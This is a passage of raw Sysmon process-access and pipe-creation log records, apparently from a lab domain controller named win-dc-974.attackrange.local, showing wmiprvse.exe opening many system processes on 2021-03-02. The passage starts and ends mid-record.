Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236977Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.293{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236976Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.293{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236975Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.293{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002236974Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:52:52.274{05ADC7E1-6D64-603E-76AA-00000000AD01}8976\PSHost.132591775721481487.8976.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002236973Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.274{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236972Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.274{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236971Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.274{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236970Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.274{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236969Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.274{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-79AA-00000000AD01}13796C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236968Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.274{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-79AA-00000000AD01}13796C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236967Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.274{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236966Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.274{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236965Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.274{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236964Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.274{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236963Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.274{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236962Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.274{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236961Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.274{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236960Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.274{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236959Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.274{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236958Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.274{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236957Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.274{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236956Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 